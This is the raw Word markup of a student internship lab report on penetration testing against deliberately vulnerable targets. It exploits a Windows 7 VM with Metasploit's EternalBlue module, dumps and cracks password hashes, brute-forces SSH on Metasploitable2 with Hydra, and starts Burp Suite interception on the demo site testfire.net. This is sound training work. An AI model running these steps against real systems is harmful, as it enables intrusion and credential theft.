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C25" w14:textId="6CDCA3BA" w:rsidR="007B4D5F" w:rsidRDefault="007B4D5F" w:rsidP="00F860EF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Hlk131149559"/>
      <w:bookmarkStart w:id="1" w:name="_Hlk131233308"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="2DE6A4A9" w14:textId="77777777" w:rsidR="00F860EF" w:rsidRPr="00F96115" w:rsidRDefault="00F860EF" w:rsidP="00F860EF">
      <w:pPr>
        <w:jc w:val="center"/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</w:pPr>
      <w:r w:rsidRPr="00F96115"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  <w:t xml:space="preserve">INTERNSHIP PROGRAM – </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1060C7" w14:textId="0E9965E4" w:rsidR="00F860EF" w:rsidRPr="00F96115" w:rsidRDefault="00F860EF" w:rsidP="00F860EF">
      <w:pPr>
        <w:jc w:val="center"/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</w:pPr>
      <w:r w:rsidRPr="00F96115"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  <w:t>CYBER SECURITY OFFLINE PROJECT WORK/TASK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E551235" w14:textId="3ED0D88D" w:rsidR="00F860EF" w:rsidRPr="00F96115" w:rsidRDefault="00F860EF" w:rsidP="00F860EF">
      <w:pPr>
        <w:jc w:val="center"/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</w:pPr>
      <w:r w:rsidRPr="00F96115">
        <w:rPr>
          <w:rFonts w:ascii="Agency FB" w:hAnsi="Agency FB" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="96"/>
          <w:szCs w:val="96"/>
        </w:rPr>
        <w:t>(FEB 2023)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079888C1" w14:textId="01C318AD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56DECA" w14:textId="59AD8A67" w:rsidR="00F860EF" w:rsidRDefault="00F860EF" w:rsidP="00F860E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A372E6" w14:textId="7E0F9386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From: </w:t>
      </w:r>
      <w:r w:rsidR="00010E89">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Shweta Sonam</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AC015D" w14:textId="0D189C97" w:rsidR="00F860EF" w:rsidRDefault="00F860EF" w:rsidP="00F860E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14:paraId="38C84E6A" w14:textId="777516B1" w:rsidR="00F860EF" w:rsidRP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</w:p>
    <w:p w14:paraId="61F46A80" w14:textId="05C93D3C" w:rsid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ROUP 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533CCC26" w14:textId="77777777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1. Install the below software:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E70B2BB" w14:textId="04EC49D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a) Virtual box</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2485A37A" w14:textId="49311C4D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b) Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DD363E" w14:textId="2C1776AC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c) Metasploit machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143EC9F1" w14:textId="37A0B412" w:rsidR="00F860EF" w:rsidRPr="00EA5507" w:rsidRDefault="00F860EF" w:rsidP="00F860E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    d) Windows 7 machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151953FD" w14:textId="77777777" w:rsidR="00654C64" w:rsidRDefault="00654C64" w:rsidP="00F860EF">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B28D674" w14:textId="07B7C943" w:rsidR="00F860EF" w:rsidRDefault="00F860EF" w:rsidP="00F860E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BEF3AED" wp14:editId="0212D90E">
            <wp:extent cx="5728700" cy="2968406"/>
            <wp:effectExtent l="0" t="0" r="5715" b="3810"/>
            <wp:docPr id="82994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845" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId6"/>
                    <a:srcRect l="1" r="11" b="7890"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5730880" cy="29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B33B" w14:textId="05D8B880" w:rsidR="00654C64" w:rsidRDefault="00654C64" w:rsidP="00F860EF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D5A5E58" w14:textId="282A3031" w:rsidR="00654C64" w:rsidRPr="00BA4D50" w:rsidRDefault="00654C64" w:rsidP="00F860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A4D50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BA4D50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> as we can see, I have installed the VMware Workstation 17 as my virtual machine and in that I have integrated:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662AC6B6" w14:textId="4FFDFDEB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 xml:space="preserve">Kali Linux: Debian 11 x 64 bit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC70BF0" w14:textId="43A3F722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Metasploit Machine: Metasploitable2-Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C960215" w14:textId="7587A0D0" w:rsidR="00654C64" w:rsidRPr="00BA4D50" w:rsidRDefault="00654C64" w:rsidP="00654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Windows &amp; Machine: Windows 7 x64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F6EC04" w14:textId="77777777" w:rsidR="00F860EF" w:rsidRPr="00F860EF" w:rsidRDefault="00F860EF" w:rsidP="00F860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CB6805" w14:textId="77777777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0DB58FD7" w14:textId="161E345C" w:rsidR="00654C64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2. Perform password cracking - Offline mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C556289" w14:textId="77777777" w:rsidR="00654C64" w:rsidRPr="00EA5507" w:rsidRDefault="00654C64" w:rsidP="00654C64">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof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a) Perform password cracking of windows 7 machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095BE9E6" w14:textId="6231A6BF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52D05F6F" w14:textId="2F12D054" w:rsidR="00BA4D50" w:rsidRPr="00EA5507" w:rsidRDefault="00654C64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5507">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>STE</w:t>
      </w:r>
      <w:r w:rsidR="00BA4D50"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P </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA5507">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">1: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A974BEF" w14:textId="03EFCB10" w:rsidR="00654C64" w:rsidRPr="00BA4D50" w:rsidRDefault="00654C64" w:rsidP="00654C64">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Hlk131149391"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BA4D50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>First</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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 the we check our </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BA4D50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ddress by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ifconfig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 then we scan the available </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BA4D50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networks available</w:t>
      </w:r>
      <w:r w:rsidR="00BA4D50" w:rsidRPr="00BA4D50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> by the command </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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="00BA4D50"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 w:rsidR="00BA4D50" w:rsidRPr="00BA4D50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4FB4A08A" w14:textId="77777777" w:rsidR="00BA4D50" w:rsidRDefault="00BA4D50" w:rsidP="00654C64">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E18718D" w14:textId="3D06FA14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C722BA3" wp14:editId="61D765F6">
            <wp:extent cx="4852657" cy="5396950"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:docPr id="83958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3943" r="57352" b="29668"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4919074" cy="54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6927" w14:textId="5E2EC326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</w:p>
    <w:p w14:paraId="73F7DEA2" w14:textId="63E54B2D" w:rsidR="00BA4D50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E81E904" w14:textId="00666AD1" w:rsidR="00BA4D50" w:rsidRPr="00BA4D50" w:rsidRDefault="00BA4D50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that we hav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 of our Windows 7 Machine, we need to discover the hosts and services of the Windows 7 machine by using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V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A7E6B9" w14:textId="77777777" w:rsidR="00BA4D50" w:rsidRDefault="00BA4D50" w:rsidP="00654C64">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43916E8A" w14:textId="2D947060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EFF1737" wp14:editId="396B493C">
            <wp:extent cx="5599318" cy="2163779"/>
            <wp:effectExtent l="0" t="0" r="1905" b="8255"/>
            <wp:docPr id="60681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r="52901" b="59009"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5652639" cy="21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9F1B" w14:textId="77777777" w:rsidR="00592A9D" w:rsidRPr="00244EB6" w:rsidRDefault="00BA4D50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60898A20" w14:textId="66960932" w:rsidR="00BA4D50" w:rsidRPr="00592A9D" w:rsidRDefault="00BA4D50" w:rsidP="00654C64">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Hlk131183709"/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</w:t>
      </w:r>
      <w:r w:rsidR="00592A9D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">look for the ports which are vulnerable to exploit the windows </w:t>
      </w:r>
      <w:r w:rsidR="0072357E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00592A9D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine using the command</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidR="00592A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 xml:space="preserve"> –script </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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smb-vul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00592A9D" w:rsidRPr="00592A9D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14:paraId="52A9323E" w14:textId="77777777" w:rsidR="00BA4D50" w:rsidRDefault="00BA4D50" w:rsidP="00654C64">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12F73409" w14:textId="6EEB743C" w:rsidR="00BA4D50" w:rsidRDefault="00BA4D50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069F30" wp14:editId="1479EEC9">
            <wp:extent cx="4904990" cy="3207389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1655359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7" r="54823" b="31496"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4947844" cy="32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14E3" w14:textId="0A082211" w:rsidR="00592A9D" w:rsidRPr="00244EB6" w:rsidRDefault="00592A9D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4:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750F984D" w14:textId="7AC6FB6E" w:rsidR="00592A9D" w:rsidRPr="00592A9D" w:rsidRDefault="00592A9D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592A9D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>msfcons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probably the best interface to the Metasploit framework (MSF). It provides and all-in-one centralized console and allows you to efficiently access virtually to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>all 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o</w:t>
      </w:r>
      <w:r w:rsidR="0072357E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tions available in MSF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0F6502" w14:textId="247A3113" w:rsidR="00592A9D" w:rsidRDefault="00592A9D" w:rsidP="00654C64">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4811527A" wp14:editId="5B95FF90">
            <wp:extent cx="3766242" cy="3893374"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:docPr id="741515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9862" r="65394" b="561"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3784553" cy="39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5FBE" w14:textId="6CEC4399" w:rsidR="00592A9D" w:rsidRDefault="00592A9D" w:rsidP="00654C64">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EEA3A25" w14:textId="66FD9B15" w:rsidR="00592A9D" w:rsidRPr="00244EB6" w:rsidRDefault="00592A9D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A336BB1" w14:textId="795C10CD" w:rsidR="00592A9D" w:rsidRPr="00592A9D" w:rsidRDefault="00592A9D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s17 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>and the we will be using</w:t>
      </w:r>
      <w:r w:rsidR="00B52E56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> the first option in the list that is </w:t>
      </w:r>
      <w:r w:rsidR="00B52E56"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/windows/smb/ms17_010_eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B118C1" w14:textId="77777777" w:rsidR="00592A9D" w:rsidRDefault="00592A9D" w:rsidP="00654C64">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29E6B0FC" w14:textId="40A34594" w:rsidR="00592A9D" w:rsidRPr="00592A9D" w:rsidRDefault="00592A9D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47FC1EF" wp14:editId="596391EF">
            <wp:extent cx="5354374" cy="1714089"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="407659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0" r="21313" b="28692"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5473626" cy="17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7547" w14:textId="6AAD0001" w:rsidR="00592A9D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6:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E625E5" w14:textId="7A79C60D" w:rsidR="00B52E56" w:rsidRPr="00B52E56" w:rsidRDefault="00B52E56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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>look int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options that is available in the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windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B52E56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B52E56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>/ms17_010_eternalbl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we can see that the RHOSTS is empty so we need to se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 by the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00B52E56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>set 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BC5703" w14:textId="0898E596" w:rsidR="00B52E56" w:rsidRDefault="00B52E56" w:rsidP="00654C64">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CAC7080" wp14:editId="2E64C381">
            <wp:extent cx="5416620" cy="1987550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="111410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20288" r="17793" b="25940"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5420293" cy="19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810" w14:textId="77777777" w:rsidR="00B52E56" w:rsidRDefault="00B52E56" w:rsidP="00654C64">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07015D3C" w14:textId="00628438" w:rsidR="00B52E56" w:rsidRPr="00244EB6" w:rsidRDefault="00B52E56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5A114919" w14:textId="123177F0" w:rsidR="00B52E56" w:rsidRPr="00FB4756" w:rsidRDefault="00B52E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and we get the meterpreter shown now we can see the informatin of the windows 7 machine and then we run the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00B52E56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>hashdump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FB475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FB4756">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Here the output should be saved in a textfile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10413D92" w14:textId="14D6C38B" w:rsidR="00B52E56" w:rsidRDefault="00244EB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187574" wp14:editId="5B5EA154">
            <wp:extent cx="3848100" cy="2951532"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="855772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r="46266" b="5063"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3860105" cy="29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7570" w14:textId="0E18FE5E" w:rsidR="00B52E56" w:rsidRDefault="00B52E56" w:rsidP="00654C6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5E91675" w14:textId="4C65C947" w:rsidR="00B52E56" w:rsidRPr="00244EB6" w:rsidRDefault="00B52E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8:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E784BA" w14:textId="4967CB1D" w:rsidR="00FB4756" w:rsidRPr="00FB4756" w:rsidRDefault="00FB475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Ophcrack softwa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ere we load the text file and then crack the password of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB4756">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>windows 7 machin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068CBFA" w14:textId="65365CC8" w:rsidR="00B52E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17CB535" wp14:editId="7088D524">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1473798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5280" w14:textId="13C5CE9B" w:rsidR="00692915" w:rsidRP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4D6508D" w14:textId="1CDCF5EF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3D39AF4" w14:textId="47EC674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34299BB" w14:textId="3D1088B4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E593F34" w14:textId="00DA714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7378967" w14:textId="089F168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5A2F08E3" w14:textId="5974C4E1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6FB1D276" w14:textId="13E3FA32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C02176C" w14:textId="67495A1B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0412AFC7" w14:textId="5BEE2355" w:rsidR="00FB4756" w:rsidRDefault="00FB475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C94CC0A" w14:textId="5AF3AB51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b) Password cracking of metasploit machine using     Hydra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51002328" w14:textId="79A8A5DA" w:rsidR="00FB4756" w:rsidRPr="00244EB6" w:rsidRDefault="00FB4756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EAB2287" w14:textId="7F6EC706" w:rsidR="00E70875" w:rsidRPr="00BA4D50" w:rsidRDefault="00E70875" w:rsidP="00E70875">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA4D50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Firs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A4D50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> we access the root for that we give the command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BA4D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4D50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BA4D50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> then we give the command 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know our Metasploitable2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ress</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA4D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fter that we run the command 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Pn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V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E70875">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>sS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E70875">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> -T4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> to get to know about the ports available, their state and the service of that port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EF88FD" w14:textId="7EA38483" w:rsidR="00FB4756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FE2B3B" wp14:editId="62CD7237">
            <wp:extent cx="4114800" cy="3736823"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1708883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8076" r="47264" b="6244"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4124487" cy="37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A24E" w14:textId="2159BA3A" w:rsidR="00E70875" w:rsidRPr="00244EB6" w:rsidRDefault="00E70875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A4A065C" w14:textId="3E439D2F" w:rsidR="00E70875" w:rsidRPr="0069291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before running the hydra command, we need to save all the passwords list in a text document in the home of the kali linux and name in </w:t>
      </w:r>
      <w:r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pass.tx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need to run the hydra command </w:t>
      </w:r>
      <w:r w:rsidR="00692915">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">that is </w:t>
      </w:r>
      <w:r w:rsidR="00692915" w:rsidRPr="00692915">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>hydra “ip address of the emtasploitable machine” aah -l msfadmin -P pass.txt -s 22 -vV</w:t>
      </w:r>
      <w:r w:rsidR="00692915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5D68283" w14:textId="77777777" w:rsidR="00E70875" w:rsidRDefault="00E70875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A6C8BF0" w14:textId="7469A380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5DBFD5E" wp14:editId="73DB74C7">
            <wp:extent cx="5657850" cy="1663700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1876176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1285" b="39334"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="56578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F2DC" w14:textId="77777777" w:rsidR="00E70875" w:rsidRDefault="00E70875" w:rsidP="00654C64">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13B24FD4" w14:textId="514BAF4C" w:rsidR="00E70875" w:rsidRDefault="00E7087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03B6B1B" wp14:editId="7C62145E">
            <wp:extent cx="5731510" cy="3060700"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="1209669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1713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DB3D" w14:textId="53378AD3" w:rsidR="00244EB6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4D5AE6D" wp14:editId="266EEDD0">
            <wp:extent cx="3773882" cy="923179"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2059991088" name="Picture 205999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9421" r="56252" b="1713"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3804927" cy="9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F671" w14:textId="36477EB6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We can see in the output that for the login id: msfadmin, the password is msfadmin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD4ECD9" w14:textId="568F2DC7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4DDC0954" w14:textId="0D5EB3C9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523D873" w14:textId="4B33709E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0F744A1F" w14:textId="7B4C503D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F3137" w14:textId="10FFEAF8" w:rsidR="00692915" w:rsidRDefault="00692915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921E7B7" w14:textId="3C9CBB2A" w:rsidR="00692915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3. Perform password cracking of online vulnerable website(testfire.net) using Burpsuite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C508EE" w14:textId="5453818A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229D79A7" w14:textId="549AA1B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ist we open the burpsuite tool and open the browser and go to pag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demo/testfire.ne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n login with any random username and password. After geeting the error to login, now we go back to the burpsuite tool and in the proxy we make the </w:t>
      </w:r>
      <w:r w:rsidRPr="001C258F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>intercept O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B3C0C41" w14:textId="3C68C97F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D0FB04" wp14:editId="6559ADAE">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
